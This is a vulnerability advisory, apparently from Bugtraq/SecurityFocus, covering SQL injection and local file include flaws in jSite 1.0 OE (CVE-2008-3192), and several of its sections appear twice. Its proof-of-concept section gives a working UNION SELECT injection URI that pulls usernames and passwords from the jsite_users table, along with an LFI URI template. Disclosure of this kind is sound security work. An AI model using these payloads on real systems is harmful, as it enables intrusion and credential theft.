jSite 'index.php' SQL Injection and Local File Include Vulnerabilities
BID:30206
Info
jSite 'index.php' SQL Injection and Local File Include Vulnerabilities
| Bugtraq ID: | 30206 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-3192 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 12 2008 12:00AM |
| Updated: | May 07 2015 05:27PM |
| Credit: | S.W.A.T. |
| Vulnerable: |
Sclek jSite 1.0 OE |
| Not Vulnerable: | |
Discussion
jSite 'index.php' SQL Injection and Local File Include Vulnerabilities
jSite is prone to an SQL-injection and a local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting the SQL-injection issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The attacker can exploit the local file-include issue to execute arbitrary local script code and obtain sensitive information that may aid in further attacks.
jSite 1.0 OE is vulnerable; other versions may also be affected.
jSite is prone to an SQL-injection and a local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting the SQL-injection issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The attacker can exploit the local file-include issue to execute arbitrary local script code and obtain sensitive information that may aid in further attacks.
jSite 1.0 OE is vulnerable; other versions may also be affected.
Exploit / POC
jSite 'index.php' SQL Injection and Local File Include Vulnerabilities
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available:
1. SQL-injection issue:
http://www.example.com/index.php?page=-1/**/union/**/select/**/1,2,3,concat_ws(0x3a,user,pass),admin/**/from/**/jsite_users/*
2. Local file-include issue:
http://www.example.com/Script/index.php?module=[LFI]
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available:
1. SQL-injection issue:
http://www.example.com/index.php?page=-1/**/union/**/select/**/1,2,3,concat_ws(0x3a,user,pass),admin/**/from/**/jsite_users/*
2. Local file-include issue:
http://www.example.com/Script/index.php?module=[LFI]
Solution / Fix
jSite 'index.php' SQL Injection and Local File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
jSite 'index.php' SQL Injection and Local File Include Vulnerabilities
References:
References:
- Sclek Homepage (Sclek)